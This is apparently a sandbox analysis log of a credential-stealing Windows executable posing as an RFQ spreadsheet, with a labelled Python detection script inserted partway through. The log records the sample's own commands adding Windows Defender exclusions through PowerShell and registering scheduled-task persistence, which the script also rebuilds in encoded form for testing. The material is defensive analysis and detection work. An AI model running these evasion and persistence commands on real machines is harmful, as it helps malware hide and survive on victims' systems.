Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2063886948.00000000028CA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename93176932-712c-4cc3-b1ef-f9b971c9a078.exe4 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2069571272.0000000008217000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKZAH.exe" vs RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename93176932-712c-4cc3-b1ef-f9b971c9a078.exe4 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2062667965.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3264863330.00000000012F9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3264260880.000000000043E000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename93176932-712c-4cc3-b1ef-f9b971c9a078.exe4 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Binary or memory string: OriginalFilenameKZAH.exe" vs RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ywKDUBCUA.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, OTWUo99bfyR.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, OTWUo99bfyR.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, Ui9qhZiA7.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, Ui9qhZiA7.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, BqMB7yHhrXg.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, BqMB7yHhrXg.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, BqMB7yHhrXg.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, BqMB7yHhrXg.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.cs | Security API names: _0020.SetAccessControl
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.cs | Security API names: _0020.AddAccessRule
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.cs | Security API names: _0020.SetAccessControl
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.cs | Security API names: _0020.AddAccessRule
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, lMgrnFqi5rRuM663RZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, lMgrnFqi5rRuM663RZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.28a3730.0.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.28ab748.2.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.6bc0000.7.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/15@1/1
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | File created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Mutant created: \Sessions\1\BaseNamedObjects\amrvdJsEeRNf
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | File created: C:\Users\user\AppData\Local\Temp\tmp9347.tmp
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ-101432620247fl#U00e2#U00aexslx.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | File read: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
Source: unknown | Process created: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
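The process tree above shows the two host-side tricks the sample depends on: a Windows Defender exclusion added through PowerShell's Add-MpPreference -ExclusionPath for both the dropper and the copy in AppData\Roaming, and persistence through schtasks.exe /Create with a task definition XML staged as a tmp*.tmp file in the user's Temp directory. The Python below is an added detection example written for this page, not part of the Joe Sandbox report and not the sample's own code. It runs over constructed process-creation records modelled on the lines above; the shortened parent name RFQ-sample.exe, the base64 -EncodedCommand variant and the two benign control events are assumptions for illustration. It goes slightly beyond what the report shows by also decoding -EncodedCommand, since the same cmdlet is commonly hidden that way.

```python
"""Detection logic for the process tree above: Defender exclusions added via
Add-/Set-MpPreference and scheduled tasks registered from an XML in Temp.
Added example for this page; runs on constructed events, not live telemetry."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 style)."""
    parent_image: str
    image: str
    command_line: str


# Add-/Set-MpPreference combined with any of the exclusion parameters.
MPPREF_EXCLUSION_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b[^\n]*?-Exclusion(?:Path|Process|Extension|IpAddress)\b",
    re.IGNORECASE,
)
# schtasks /XML <file>, with the path quoted or bare.
SCHTASKS_XML_RE = re.compile(r'/XML\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# Temp locations a legitimate installer would rarely stage a task definition in.
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%TEMP%|%TMP%", re.IGNORECASE)
# -EncodedCommand and the abbreviations PowerShell accepts, followed by base64.
ENCODED_ARG_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line uses -EncodedCommand, else None."""
    m = ENCODED_ARG_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(event: ProcEvent) -> List[str]:
    """Return the behaviours one event exhibits (empty list for benign events)."""
    findings: List[str] = []
    image = event.image.lower()
    cmd = event.command_line
    decoded = decode_encoded_command(cmd)
    script = decoded if decoded is not None else cmd  # inspect the real script text

    if image.endswith(("\\powershell.exe", "\\pwsh.exe")) and MPPREF_EXCLUSION_RE.search(script):
        findings.append("defender_exclusion_encoded" if decoded else "defender_exclusion")

    if image.endswith("\\schtasks.exe") and re.search(r"/create\b", cmd, re.IGNORECASE):
        m = SCHTASKS_XML_RE.search(cmd)
        xml_path = (m.group(1) or m.group(2)) if m else None
        if xml_path and TEMP_DIR_RE.search(xml_path):
            findings.append("schtasks_xml_from_temp")
    return findings


def scan(events: List[ProcEvent]) -> List[List[str]]:
    """Apply detect() to every record, preserving order."""
    return [detect(e) for e in events]


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
DROPPER = r"C:\Users\user\Desktop\RFQ-sample.exe"  # hypothetical, shortened parent name
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed records modelled on the process tree above; the last three are an
# assumed encoded variant and two benign controls that the report does not show.
SAMPLE_EVENTS = [
    ProcEvent(DROPPER, PS,
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"'),
    ProcEvent(DROPPER, SCHTASKS,
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"'),
    ProcEvent(DROPPER, PS, "powershell.exe -EncodedCommand " + encode_powershell(
        r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ywKDUBCUA.exe'")),
    ProcEvent(EXPLORER, SCHTASKS,
              r'schtasks.exe /Create /TN "Backup" /XML "C:\ProgramData\Backup\nightly.xml"'),
    ProcEvent(EXPLORER, PS, "powershell.exe Get-MpPreference"),
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        name = event.image.split("\\")[-1]
        print(f"{name:16} {hits or 'clean'}")
```

The two rules are deliberately narrow: an exclusion is only flagged when the cmdlet and an -Exclusion* parameter appear in the same command line (or in its decoded -EncodedCommand payload), and a task registration is only flagged when the /XML argument points into a Temp directory, so an administrator registering a task from ProgramData or merely reading the Defender configuration does not fire. Add a check on the parent image (here a user-profile executable spawning powershell.exe and schtasks.exe) as a further precision gate in a production rule.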
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
